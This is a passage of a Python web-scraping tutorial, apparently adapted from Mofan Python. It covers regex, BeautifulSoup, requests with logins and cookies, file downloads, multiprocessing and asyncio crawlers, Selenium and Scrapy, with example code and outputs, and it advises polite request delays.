    dog catches to cat
re.split: splitting
    print(re.split(r"[,;\.]", "a;b;c;d;e"))
    ['a', 'b', 'c', 'd', 'e']
compile: pre-compile the pattern for reuse
    # compile
    compiled_re = re.compile(r"r[ua]n")
    print(compiled_re.search("dog ran to cat"))
    <re.Match object; span=(4, 7), match='ran'>
Cheat sheet

(regex cheat sheet image)

Scraping the page title with a regular expression
    import re

# capture what lies between <title> and </title>
    res = re.findall(r"<title>(.+?)</title>", html)
    print("\nPage title is: ", res[0])
    Page title is:  Scraping tutorial 1 | 莫烦 Python
Finding the paragraph text
    res = re.findall(r"<p>(.*?)</p>", html, flags=re.DOTALL)  # flags=re.DOTALL 选取多行信息
    print("\nPage paragraphs: ", res[0])
    Page paragraphs:  这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.

Finding all hyperlinks
    res = re.findall(r'href="(.*?)"', html)
    print("\nAll links: ", res)
    All links:  ['https://morvanzhou.github.io/static/img/description/tab_icon.png', 'https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']

2.1 Parsing web pages with BeautifulSoup: basics

Beautiful Soup documentation (Chinese)

BeautifulSoup gives you higher-level matching than hand-written regular expressions!

    pip install beautifulsoup4
Requirement already satisfied: beautifulsoup4 in c:\users\gzjzx\anaconda3\lib\site-packages (4.11.1)
Requirement already satisfied: soupsieve>1.2 in c:\users\gzjzx\anaconda3\lib\site-packages (from beautifulsoup4) (2.3.1)
Note: you may need to restart the kernel to use updated packages.

Basic usage of BeautifulSoup

Loading the page
    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>
Feed the downloaded page to BeautifulSoup
soup = BeautifulSoup(html, features='lxml')  # parser: lxml
print(soup.h1)  # select the h1 tag
print('\n', soup.p)  # select the p tag
<h1>爬虫测试 1</h1>

 <p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p>
all_href = soup.find_all('a')  # find all <a> tags
    all_href = [l['href'] for l in all_href]
    print(all_href)
    ['https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']
    all_href = soup.find_all('a')
    print(all_href)
    [<a href="https://morvanzhou.github.io/">莫烦 Python</a>, <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a>]
all_href = soup.find_all('a')
for l in all_href:
    print(l['href'])
https://morvanzhou.github.io/
https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

2.2 Parsing web pages with BeautifulSoup: CSS classes

    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/list.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 列表 class | 莫烦 Python</title><style>.jan {background-color: yellow;}.feb {font-size: 25px;}.month {color: red;}</style></head><body><h1>列表 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><ul><li class="month">一月</li><ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul><li class="feb month">二月</li><li class="month">三月</li><li class="month">四月</li><li class="month">五月</li></ul></body></html>
soup = BeautifulSoup(html, features='lxml')
# match by class name
month = soup.find_all('li', {"class": "month"})  # pass a dict: find <li> whose class contains the word month
for m in month:
    print(m)  # the whole tag
    print(m.get_text())  # only the text inside it
    <li class="month">一月</li>一月<li class="feb month">二月</li>二月<li class="month">三月</li>三月<li class="month">四月</li>四月<li class="month">五月</li>五月
    jan = soup.find('ul', {"class": "jan"})
    print(jan)
    <ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul>
d_jan = jan.find_all('li')  # use jan as the parent and search inside it
for d in d_jan:
    print(d.get_text())
一月一号
一月二号
一月三号

2.3 Parsing web pages with BeautifulSoup: regular expressions

    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/table.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 表格 table | 莫烦 Python</title><style>img {width: 250px;}table{width:50%;}td{margin:10px;padding:15px;}</style></head><body><h1>表格 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><br/><table id="course-list"><tr><th>分类</th><th>名字</th><th>时长</th><th>预览</th></tr><tr id="course1" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/">Tensorflow 神经网络</a></td><td>2:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/tf.jpg"></td></tr><tr id="course2" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/">强化学习</a></td><td>5:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/rl.jpg"></td></tr><tr id="course3" class="data"><td>数据处理</td><td><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫</a></td><td>3:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/scraping.jpg"></td></tr></table></body></html>

Finding all image links

    soup = BeautifulSoup(html, features='lxml')

    img_links = soup.find_all("img", {"src": re.compile('.*?\.jpg')})
    for link in img_links:
    print(link['src'])
https://morvanzhou.github.io/static/img/course_cover/tf.jpg
https://morvanzhou.github.io/static/img/course_cover/rl.jpg
https://morvanzhou.github.io/static/img/course_cover/scraping.jpg

Setting a specific matching rule

course_links = soup.find_all(
    'a', {'href': re.compile('https://morvan.*')})
for link in course_links:
    print(link['href'])
https://morvanzhou.github.io/
https://morvanzhou.github.io/tutorials/data-manipulation/scraping/
https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/
https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/
https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

2.4 Exercise: crawling Baidu Baike

Set the start address

    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

Print the URL

url = base_url + his[-1]  # join the last entry of his onto the base URL
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711

Collecting links

# find valid links
# the pattern on this page: item links look like <a target="_blank" href="/item/...">
# with an href made of percent-encoded bytes
sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
else:
    # no valid link found: backtrack
    his.pop()
    print(his)
    ['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E7%BD%91%E7%BB%9C%E6%95%B0%E6%8D%AE']

Putting it in a loop

    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

for i in range(20):  # crawl 20 pages first
    url = base_url + his[-1]  # join the last entry of his onto the base URL
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])

    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
        his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
        # no valid link found: backtrack
        his.pop()
print(his)
网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711
搜索引擎 url: /item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E
百度 url: /item/%E7%99%BE%E5%BA%A6
百度旅游 url: /item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8
上地 url: /item/%E4%B8%8A%E5%9C%B0
北至 url: /item/%E5%8C%97%E8%87%B3
西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B
缘竿 url: /item/%E7%BC%98%E7%AB%BF
西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B
扛鼎 url: /item/%E6%89%9B%E9%BC%8E
任鄙 url: /item/%E4%BB%BB%E9%84%99
孟说 url: /item/%E5%AD%9F%E8%AF%B4
乌获 url: /item/%E4%B9%8C%E8%8E%B7
秦国 url: /item/%E7%A7%A6%E5%9B%BD
雍城 url: /item/%E9%9B%8D%E5%9F%8E
秦德公 url: /item/%E7%A7%A6%E5%BE%B7%E5%85%AC
秦宪公 url: /item/%E7%A7%A6%E5%AE%81%E5%85%AC
秦静公 url: /item/%E7%A7%A6%E9%9D%99%E5%85%AC
秦文公 url: /item/%E7%A7%A6%E6%96%87%E5%85%AC
宝鸡 url: /item/%E5%AE%9D%E9%B8%A1%E5%B8%82
['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E', '/item/%E7%99%BE%E5%BA%A6', '/item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8', '/item/%E4%B8%8A%E5%9C%B0', '/item/%E5%8C%97%E8%87%B3', '/item/%E8%A5%BF%E4%BA%AC%E8%B5%8B', '/item/%E6%89%9B%E9%BC%8E', '/item/%E4%BB%BB%E9%84%99', '/item/%E5%AD%9F%E8%AF%B4', '/item/%E4%B9%8C%E8%8E%B7', '/item/%E7%A7%A6%E5%9B%BD', '/item/%E9%9B%8D%E5%9F%8E', '/item/%E7%A7%A6%E5%BE%B7%E5%85%AC', '/item/%E7%A7%A6%E5%AE%81%E5%85%AC', '/item/%E7%A7%A6%E9%9D%99%E5%85%AC', '/item/%E7%A7%A6%E6%96%87%E5%85%AC', '/item/%E5%AE%9D%E9%B8%A1%E5%B8%82', '/item/%E7%BA%A2%E6%B2%B3%E8%B0%B7']

A word of advice: Baidu Baike has anti-crawler measures, so you had better add time.sleep(2) to your program, or it may soon be unable to reach the site at all. See the sketch below for where the delay would go.
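
For example, the loop above could be throttled like this (the same code with the delay added; 2 seconds is just the suggested figure):

from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
import random
import time

base_url = "https://baike.baidu.com"
his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

for i in range(20):
    time.sleep(2)  # pause 2 s between requests to avoid triggering the anti-crawler measures
    url = base_url + his[-1]
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])
    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})
    if len(sub_urls) != 0:
        his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
        his.pop()  # dead end: backtrack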

3.1 POST, logins, and cookies (Requests)

When a browser loads a page, the request can be of several types, and these types are the key to how a page is opened. The most important methods are GET and POST (there are others too, such as HEAD and DELETE). If you are new to web architecture this may sound confusing: how do these request methods differ, and what are they for?

Let's focus on the two important ones, GET and POST; 95% of the time you will be using one of these two to request a page.

post
account logins
submitting searches
uploading images
uploading files
sending data to the server, etc.

get
opening a page normally
sends no data to the server

Installing requests

    pip install requests
Requirement already satisfied: requests in c:\users\gzjzx\anaconda3\lib\site-packages (2.27.1)
Requirement already satisfied: charset-normalizer~=2.0.0 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2.0.4)
Requirement already satisfied: idna<4,>=2.5 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (3.3)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2021.10.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (1.26.9)
Note: you may need to restart the kernel to use updated packages.

Using requests

GET request
    import requests
    # import webbrowser

    param = {"wd": "莫烦 python"}
    r = requests.get('http://www.baidu.com/s', params=param)
    print(r.url)
# webbrowser.open(r.url)  # open the page: a Baidu search for 莫烦 python
    http://www.baidu.com/s?wd=%E8%8E%AB%E7%83%A6python
POST request

    https://pythonscraping.com/pages/files/form.html

    data = {'firstname': '莫烦', 'lastname': '周'}
    r = requests.post('https://pythonscraping.com/pages/files/processing.php', data=data)
    print(r.text)
    Hello there, 莫烦 周!

With GET, the parameters travel in the URL itself (as r.url showed above); with POST, the data is sent in the request body and does not appear in the URL.

Uploading files

    https://pythonscraping.com/files/form2.html

Uploading an image is just another kind of POST.

    file = {'uploadFile': open('./images.png', 'rb')}
r = requests.post(
    'https://pythonscraping.com/pages/files/processing2.php', files=file)
    print(r.text)
    uploads/images.pngThe file image.png has been uploaded.
Logging in

    https://pythonscraping.com/pages/cookies/login.html

    payload = {'username': 'Morvan', 'password': 'password'}
r = requests.post(
    'https://pythonscraping.com/pages/cookies/welcome.php',
    data=payload)
print(r.cookies.get_dict())  # the cookies set by the page
r = requests.get('https://pythonscraping.com/pages/cookies/profile.php',
                 cookies=r.cookies)
    print(r.text)
{'loggedin': '1', 'username': 'Morvan'}
Hey Morvan! Looks like you're still logged into the site!
    session = requests.Session()
    payload = {'username': 'Morvan', 'password': 'password'}
    r = session.post('https://pythonscraping.com/pages/cookies/welcome.php', data=payload)
    print(r.cookies.get_dict())
    r = session.get("https://pythonscraping.com/pages/cookies/welcome.php")
    print(r.text)
{'loggedin': '1', 'username': 'Morvan'}
<h2>Welcome to the Website!</h2>You have logged in successfully! <br/><a href="profile.php">Check out your profile!</a>

3.2 Downloading files

Set the save path and the image URL

    import os

os.makedirs('./img/', exist_ok=True)  # create the save directory
IMAGE_URL = "http://www.baidu.com/img/flexible/logo/pc/result.png"  # the image to download

urlretrieve: fetching a URL

    from urllib.request import urlretrieve

    urlretrieve(IMAGE_URL, './img/images1.png')
    ('./img/images1.png', <http.client.HTTPMessage at 0x27e707a86a0>)

Using requests

'wb' opens the file in binary write mode: if the file already exists it is overwritten from the beginning; otherwise a new file is created.

    import requests

    r = requests.get(IMAGE_URL)
with open('./img/images2.png', 'wb') as f:
    f.write(r.content)

For a larger file, stream the download

r = requests.get(IMAGE_URL, stream=True)
with open('./img/images3.png', 'wb') as f:
    for chunk in r.iter_content(chunk_size=32):  # write 32 bytes at a time
        f.write(chunk)

3.3 Exercise: downloading National Geographic photos

Photo of the Day - the Chinese-language site of National Geographic magazine

The site seems to have been updated with anti-crawler protection, so this scrapes "February 27, 2018 | iDaily" instead.

Set the address

    from bs4 import BeautifulSoup
    import requests

    URL = "http://m.idai.ly/se/a193iG?1661356800"

Set the crawler parameters

(screenshot of the page structure)

Note that each image sits inside a parent div with class="photo".

    html = requests.get(URL).text
    soup = BeautifulSoup(html, 'lxml')
    img_ul = soup.find_all('div', {'class': 'photo'})
    img_ul
    [<div class="photo"><img src="http://pic.yupoo.com/fotomag/H9yil7z0/TaRLX.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/757ee474/10530738.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/946704b4/66933a50.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/7aa989ff/b4882755.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/cb529779/d8c7a395.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/2e45a0cd/85b8cc7b.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/e1989816/20e2ebdc.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/42034c62/e67c02ab.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/267e386a/88c891b6.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/65ad43ae/e5d8c29e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/1213e2a1/3faaaedd.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/d009c863/b6f97eca.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/76c66979/84fa84fa.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/9023854c/619b3b2e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/8a75067c/2a3ecbf9.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/30e65430/a1f9a680.jpg"/><div class="overlay"></div></div>]

Create the save folder

    import os

    os.makedirs('./img/', exist_ok=True)

Download

for ul in img_ul:
    imgs = ul.find_all('img')
    for img in imgs:
        url = img['src']
        r = requests.get(url, stream=True)
        image_name = url.split('/')[-1]
        with open('./img/%s' % image_name, 'wb') as f:
            for chunk in r.iter_content(chunk_size=128):
                f.write(chunk)
        print('Saved %s' % image_name)
Saved TaRLX.jpg
Saved 10530738.jpg
Saved 66933a50.jpg
Saved b4882755.jpg
Saved d8c7a395.jpg
Saved 85b8cc7b.jpg
Saved 20e2ebdc.jpg
Saved e67c02ab.jpg
Saved 88c891b6.jpg
Saved e5d8c29e.jpg
Saved 3faaaedd.jpg
Saved b6f97eca.jpg
Saved 84fa84fa.jpg
Saved 619b3b2e.jpg
Saved 2a3ecbf9.jpg
Saved a1f9a680.jpg

The files we scraped:

(screenshot of the downloaded images)

4.1 Distributed crawling with multiprocessing


    import multiprocessing as mp
    import time
    from urllib.request import urlopen, urljoin
    from bs4 import BeautifulSoup
    import re

    base_url = "https://mofanpy.com/"

# do not crawl one site continuously, or you may never be able to reach it again
if base_url != "https://127.0.0.1:4000/":  # crawling an external site: restrict the crawl
    restricted_crawl = True
else:
    restricted_crawl = False

Define the crawl function

def crawl(url):
    response = urlopen(url)
    time.sleep(0.1)  # a slight delay per download: 0.1 s
    return response.read().decode()

Parsing

def parse(html):
    soup = BeautifulSoup(html, 'lxml')
    urls = soup.find_all('a', {'href': re.compile('^/.+?$')})
    title = soup.find('h1').get_text().strip()
    # set() builds an unordered collection of unique elements, deduplicating the page URLs
    page_urls = set([urljoin(base_url, url['href']) for url in urls])
    url = soup.find('meta', {'property': 'og:url'})['content']
    return title, page_urls, url

Crawling the normal (serial) way

unseen = set([base_url,])
seen = set()

count, t1 = 1, time.time()

while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
        break

    print('\nDistributed Crawling...')
    htmls = [crawl(url) for url in unseen]

    print('\nDistributed Parsing...')
    results = [parse(html) for html in htmls]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
        print(count, title, url)
        count += 1
        unseen.update(page_urls - seen)
print('Total time: %.1f s' % (time.time() - t1, ))
Distributed Crawling...
Distributed Parsing...
Analysing...
1 莫烦 Python 主页 http://mofanpy.com/
Distributed Crawling...
Distributed Parsing...
Analysing...
2 数据处理 http://mofanpy.com/tutorials/data-manipulation
3 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro/
4 机器学习 http://mofanpy.com/tutorials/machine-learning
5 Python 基础教学 http://mofanpy.com/tutorials/python-basic
6 其他效率教程 http://mofanpy.com/tutorials/others
Distributed Crawling...
Distributed Parsing...
Analysing...
7 Numpy 数据怪兽 http://mofanpy.com/tutorials/data-manipulation/numpy
8 Matplotlib 画图 http://mofanpy.com/tutorials/data-manipulation/plt
9 交互式学 Python http://mofanpy.com/tutorials/python-basic/interactive-python/
10 进化算法 (Evolutionary-Algorithm) http://mofanpy.com/tutorials/machine-learning/evolutionary-algorithm/
11 强化学习 (Reinforcement Learning) http://mofanpy.com/tutorials/machine-learning/reinforcement-learning/
12 自然语言处理 http://mofanpy.com/tutorials/machine-learning/nlp/
13 数据的伙伴 Pandas http://mofanpy.com/tutorials/data-manipulation/pandas
14 窗口视窗 (Tkinter) http://mofanpy.com/tutorials/python-basic/tkinter/
15 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro
16 PyTorch http://mofanpy.com/tutorials/machine-learning/torch/
17 Keras http://mofanpy.com/tutorials/machine-learning/keras/
18 SciKit-Learn http://mofanpy.com/tutorials/machine-learning/sklearn/
19 Theano http://mofanpy.com/tutorials/machine-learning/theano/
20 多线程 (Threading) http://mofanpy.com/tutorials/python-basic/threading/
21 多进程 (Multiprocessing) http://mofanpy.com/tutorials/python-basic/multiprocessing/
22 Linux 简易教学 http://mofanpy.com/tutorials/others/linux-basic/
23 Tensorflow http://mofanpy.com/tutorials/machine-learning/tensorflow/
24 生成模型 GAN 网络 http://mofanpy.com/tutorials/machine-learning/gan/
25 Git 版本管理 http://mofanpy.com/tutorials/others/git/
26 机器学习实战 http://mofanpy.com/tutorials/machine-learning/ML-practice/
27 网页爬虫 http://mofanpy.com/tutorials/data-manipulation/scraping
Total time: 7.4 s

Crawling with multiprocessing

unseen = set([base_url,])
seen = set()

pool = mp.Pool(4)
count, t1 = 1, time.time()
while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
        break
    print('\nDistributed Crawling...')
    crawl_jobs = [pool.apply_async(crawl, args=(url,)) for url in unseen]
    htmls = [j.get() for j in crawl_jobs]

    print('\nDistributed Parsing...')
    parse_jobs = [pool.apply_async(parse, args=(html,)) for html in htmls]
    results = [j.get() for j in parse_jobs]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
        print(count, title, url)
        count += 1
        unseen.update(page_urls - seen)
print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...
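
(The output stops after the first line. A likely cause, stated as an assumption: mp.Pool inside Jupyter, especially on Windows, spawns fresh worker processes that cannot import functions defined in the notebook, so the crawl jobs never complete; running the same code as a standalone .py script under if __name__ == '__main__': avoids this.)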

4.2 Speeding up the crawler: asynchronous loading with asyncio

I had long been thinking about how to speed up my crawler with multiprocessing or threading, and in some small experiments we did indeed see a decent efficiency gain. But digging deeper, I found that Python also offers a powerful tool called asyncio: using only a single thread, it achieves an effect similar to multithreading/multiprocessing.

The idea, briefly: within a single thread, the work is done asynchronously, so downloading a page and processing a page are decoupled, and the time spent waiting on downloads is put to better use.

So today let's try replacing multiprocessing or threading with asyncio and see how it goes.


The normal (synchronous) way

import time


def job(t):
    print('Start job', t)
    time.sleep(t)
    print('Job', t, 'takes', t, 's')


def main():
    [job(t) for t in range(1, 3)]


t1 = time.time()
main()
print('NO async total time: ', time.time() - t1)
Start job 1
Job 1 takes 1 s
Start job 2
Job 2 takes 2 s
NO async total time:  3.010831594467163

    asyncio

Jupyter's support for asyncio is not great; switch to PyCharm (or use the notebook workaround sketched below).
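
The conflict comes from the notebook already running its own event loop, which run_until_complete collides with. A minimal workaround sketch, assuming IPython 7+ where a cell may use top-level await:

# inside a Jupyter cell: do not create a second loop, just await directly
import asyncio

async def job(t):
    await asyncio.sleep(t)
    return t

results = await asyncio.gather(job(1), job(2))  # top-level await works in IPython 7+
print(results)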

import time
import asyncio


async def job(t):  # an async-style function (coroutine)
    print('Start job ', t)
    await asyncio.sleep(t)  # wait t seconds; other tasks run in the meantime
    print('Job ', t, ' takes ', t, ' s')


async def main(loop):  # an async-style function (coroutine)
    tasks = [
        loop.create_task(job(t)) for t in range(1, 3)
    ]  # create the tasks without running them yet
    await asyncio.wait(tasks)  # run and wait until all tasks finish


t1 = time.time()
loop = asyncio.get_event_loop()  # create the event loop
loop.run_until_complete(main(loop))  # run the loop
loop.close()  # close the loop
print("Async total time : ", time.time() - t1)
Start job  1
Start job  2
Job  1  takes  1  s
Job  2  takes  2  s
Async total time :  2.019124984741211

Fetching pages the normal way

import requests

URL = 'https://mofanpy.com/'


def normal():
    for i in range(2):
        r = requests.get(URL)
        url = r.url
        print(url)

t1 = time.time()
normal()
print("Normal total time:", time.time() - t1)
https://mofanpy.com/
https://mofanpy.com/
Normal total time: 0.26386022567749023

Using asyncio (with aiohttp)

import aiohttp
import time
import asyncio

URL = 'https://mofanpy.com/'

async def job(session):
    response = await session.get(URL)  # await the response; other tasks run meanwhile
    return str(response.url)


async def main(loop):
    async with aiohttp.ClientSession() as session:  # the session form recommended by the aiohttp docs
        tasks = [loop.create_task(job(session)) for _ in range(2)]
        finished, unfinished = await asyncio.wait(tasks)
        all_results = [r.result() for r in finished]  # collect all results
        print(all_results)

t1 = time.time()
loop = asyncio.get_event_loop()
loop.run_until_complete(main(loop))
loop.close()
print("Async total time:", time.time() - t1)
['https://mofanpy.com/', 'https://mofanpy.com/']
Async total time: 0.1562364101409912
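
A side note, not from the original tutorial: on newer Python versions, asyncio.get_event_loop() outside a running loop is deprecated, and the modern entry point is asyncio.run. The same example could be sketched as:

import asyncio
import time
import aiohttp

URL = 'https://mofanpy.com/'

async def job(session):
    response = await session.get(URL)
    return str(response.url)

async def main():
    async with aiohttp.ClientSession() as session:
        tasks = [asyncio.create_task(job(session)) for _ in range(2)]
        print(await asyncio.gather(*tasks))  # gather keeps the results in order

t1 = time.time()
asyncio.run(main())  # creates, runs, and closes the event loop for you
print("Async total time:", time.time() - t1)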

5.1 Advanced crawling: let Selenium drive your browser for you

So when would you need Selenium? When you:

• find that ordinary methods cannot scrape the content you want
• face a site that plays hide-and-seek with you, with too much JavaScript-rendered content
• need a crawler that browses like a human

This plugin records what you do in the browser. Back when I played online games I used a macro tool called 按键精灵 to do lots of repetitive work for me; it saved my mouse, my keyboard, and of course my fingers, and I secretly gloated while watching everyone else click away. The Katalon Recorder plugin + Selenium works on the same idea: record your actions once, then have the computer repeat them a thousand times.

Every time you click, the plugin records the click in a log. Then the magic happens: hit the Export button and you can see the browsing code it has generated for you!

(screenshots: Katalon Recorder recording actions, and the exported code)

Installation

selenium + the Edge browser (tk1023's blog on CSDN, "edge selenium")

    “Hello world”

from time import sleep
from selenium import webdriver

driver = webdriver.Edge()  # launch the Edge browser

driver.get(r'https://www.baidu.com/')  # open https://www.baidu.com/

sleep(5)  # after 5 seconds
driver.close()  # close the browser

Controlling the browser from Python

from selenium import webdriver

driver = webdriver.Edge()  # launch the Edge browser

# paste the code you just exported here
driver.get("https://mofanpy.com/")
driver.find_element_by_xpath(u"//img[@alt='强化学习 (Reinforcement Learning)']").click()
driver.find_element_by_link_text("About").click()
driver.find_element_by_link_text(u"赞助").click()
driver.find_element_by_link_text(u"教程 ▾").click()
driver.find_element_by_link_text(u"数据处理 ▾").click()
driver.find_element_by_link_text(u"网页爬虫").click()

# grab the page html; you can take a screenshot too
html = driver.page_source  # get html
driver.get_screenshot_as_file("./img/sreenshot1.png")
driver.close()

(the screenshot saved by the code above)

But having to watch the browser carry out these actions every time is a bit inconvenient. We can keep Selenium from popping up a browser window and let it work quietly in the background: defining a few options before creating the driver strips away the browser's "body".

# the original author used Chrome; this does not run here (we are driving Edge)
from selenium.webdriver.chrome.options import Options

chrome_options = Options()
chrome_options.add_argument("--headless")  # define headless

driver = webdriver.Chrome(chrome_options=chrome_options)
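
For Edge, the same idea might look like this (a sketch assuming Selenium 4, where Edge has its own Options class and the keyword is options= rather than chrome_options=):

from selenium import webdriver
from selenium.webdriver.edge.options import Options

edge_options = Options()
edge_options.add_argument("--headless")  # run Edge without opening a window

driver = webdriver.Edge(options=edge_options)
driver.get("https://mofanpy.com/")
print(driver.title)  # the page is still loaded and fully scriptable
driver.quit()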

Selenium can do much more, such as filling in forms and driving the keyboard (a small sketch follows below).
This tutorial is only an introduction and will not go into the details; if you want to dig deeper, head over to their official Python documentation site.
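
For instance, filling in a search form might look like the sketch below (assuming Selenium 4's By locators; the element id kw is Baidu's search box at the time of writing):

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys

driver = webdriver.Edge()
driver.get("https://www.baidu.com/")
box = driver.find_element(By.ID, "kw")  # locate the search input
box.send_keys("莫烦 python")  # type into the form field
box.send_keys(Keys.ENTER)  # press Enter to submit the search
driver.quit()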

Finally, Selenium's strength should be clear by now: it conveniently simulates your own actions, and adding further actions is easy.

But it has drawbacks too; Selenium is not always the right choice. Because it must open a browser and load far more resources, it is certainly slower than the other modules. So if you need speed and can do without Selenium, do without it.

5.2 Advanced crawling: the efficient, worry-free Scrapy framework


import scrapy


class MofanSpider(scrapy.Spider):
    name = "mofan"
    start_urls = [
        'https://mofanpy.com/',
    ]
    # unseen = set()
    # seen = set()  # we no longer need sets: Scrapy deduplicates automatically

    def parse(self, response):
        yield {  # return some results
            'title': response.css('h1::text').extract_first(default='Missing').strip().replace('"', ""),
            'url': response.url,
        }
